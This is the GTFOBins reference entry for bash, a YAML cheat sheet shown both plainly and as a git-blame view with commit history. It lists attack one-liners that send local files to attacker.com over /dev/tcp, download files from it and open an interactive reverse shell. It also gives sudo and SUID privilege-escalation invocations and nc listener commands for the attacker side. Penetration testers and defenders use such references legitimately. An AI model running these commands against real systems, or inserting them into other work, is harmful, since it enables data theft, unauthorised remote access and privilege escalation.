GTFOBins.github.io/_gtfobins/bash.md

---
functions:
  execute-interactive:
    - code: bash
  sudo-enabled:
    - code: sudo bash
  suid-enabled:
    - code: ./bash -p
  upload:
    - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        export LFILE=file_to_send
        bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
    - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        export LFILE=file_to_send
        bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
  download:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        export LFILE=file_to_get
        bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
            3<>/dev/tcp/$RHOST/$RPORT \
            | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
    - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        export LFILE=file_to_get
        bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
  reverse-shell-interactive:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
  file-read:
    - description: It trims trailing newlines and it's not binary-safe.
      code: |
        export LFILE=file_to_read
        bash -c 'echo "$(<$LFILE)"'
  file-write:
    - code: |
        export LFILE=file_to_write
        bash -c 'echo data > $LFILE'
---
First commit 2018-05-21 21:14:41 +02:00			`---`
			`functions:`
Reorganize function names 2018-05-25 15:30:02 +02:00			`execute-interactive:`
First commit 2018-05-21 21:14:41 +02:00			`- code: bash`
			`sudo-enabled:`
			`- code: sudo bash`
			`suid-enabled:`
			`- code: ./bash -p`
			`upload:`
Rephrase network functions descriptions 2018-05-24 22:05:07 +02:00			`- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.`
First commit 2018-05-21 21:14:41 +02:00			`code: \|`
Wrapping bash commands 2018-05-24 23:40:36 +02:00			`export RHOST=attacker.com`
			`export RPORT=12345`
			`export LFILE=file_to_send`
Avoid cat in bash 2018-06-12 16:17:34 +02:00			`bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'`
Replace where_to_save with file_to_save 2018-06-04 19:53:35 +02:00			- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
First commit 2018-05-21 21:14:41 +02:00			`code: \|`
Wrapping bash commands 2018-05-24 23:40:36 +02:00			`export RHOST=attacker.com`
			`export RPORT=12345`
			`export LFILE=file_to_send`
			`bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'`
First commit 2018-05-21 21:14:41 +02:00			`download:`
			`- description: Fetch a remote file via HTTP GET request.`
			`code: \|`
Wrapping bash commands 2018-05-24 23:40:36 +02:00			`export RHOST=attacker.com`
			`export RPORT=12345`
			`export LFILE=file_to_get`
Fix bash download script 2018-05-25 00:23:02 +02:00			`bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \`
			`3<>/dev/tcp/$RHOST/$RPORT \`
			`\| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'`
Rephrase network functions descriptions 2018-05-24 22:05:07 +02:00			- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
Fix YAML literal blocks 2018-06-01 12:40:05 +02:00			`code: \|`
Wrapping bash commands 2018-05-24 23:40:36 +02:00			`export RHOST=attacker.com`
			`export RPORT=12345`
			`export LFILE=file_to_get`
			`bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'`
Reorganize function names 2018-05-25 15:30:02 +02:00			`reverse-shell-interactive:`
Rephrase network functions descriptions 2018-05-24 22:05:07 +02:00			- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
Add nc and bash other end commands 2018-05-22 19:51:52 +02:00			`code: \|`
Wrapping bash commands 2018-05-24 23:40:36 +02:00			`export RHOST=attacker.com`
			`export RPORT=12345`
			`bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'`
Fix trailing spaces 2018-05-28 19:55:44 +02:00			`file-read:`
Fix bash file read 2018-06-11 13:11:47 +02:00			`- description: It trims trailing newlines and it's not binary-safe.`
Add read/write for ash, bash, csh, dash, ed, and emacs 2018-05-28 19:09:16 +02:00			`code: \|`
			`export LFILE=file_to_read`
			`bash -c 'echo "$(<$LFILE)"'`
Add file-write to bash 2018-05-28 20:02:20 +02:00			`file-write:`
			`- code: \|`
			`export LFILE=file_to_write`
			`bash -c 'echo data > $LFILE'`
First commit 2018-05-21 21:14:41 +02:00			`---`